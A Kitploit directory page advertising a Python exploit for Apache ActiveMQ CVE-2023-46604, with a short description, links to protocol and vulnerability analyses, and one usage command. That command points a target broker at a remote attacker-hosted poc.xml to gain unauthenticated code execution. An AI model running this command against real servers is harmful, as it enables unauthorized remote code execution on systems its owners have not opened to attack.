Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-46604-Apache-ActiveMQ-RCE-exp — Python-based remote code execution exploit for Apache ActiveMQ CVE-2023-46604, leveraging the OpenWire protocol to deliver XML payloads for unauthenticated RCE. | Kitploit
Tools/GitHubGitHub/justdoit-cai/cve-2023-46604-apache-activemq-rce-exp
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationRemote Access Tool
GitHubjustdoit-cai/cve-2023-46604-apache-activemq-rce-exp

CVE-2023-46604-Apache-ActiveMQ-RCE-exp

Python-based remote code execution exploit for Apache ActiveMQ CVE-2023-46604, leveraging the OpenWire protocol to deliver XML payloads for unauthenticated RCE.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
View Repository
512 years agoNot yet reviewed
Share

Project Reference

This project is a python version of the exp rewritten based on the exp from the https://github.com/X1r0z/ActiveMQ-RCE project.

Usage

root@kitploit:~
python attack.py -u 192.168.163.129 -x http://192.168.163.133:10001/poc.xml -p 61616

The -p parameter defaults to the default port of activeMQ. Note that the -x parameter requires the protocol prefix.

Introduction

Attached here is a diagram of the openwire protocol for clarity. Below is the packet format of the type.

Throwable

For detailed vulnerability analysis, see the reference articles below.

Reference Articles

root@kitploit:~
# openwire协议的分析
https://github.com/X1r0z
https://activemq.apache.org/openwire-version-2-specification
# CVE漏洞原理的分析
https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/
Download Tool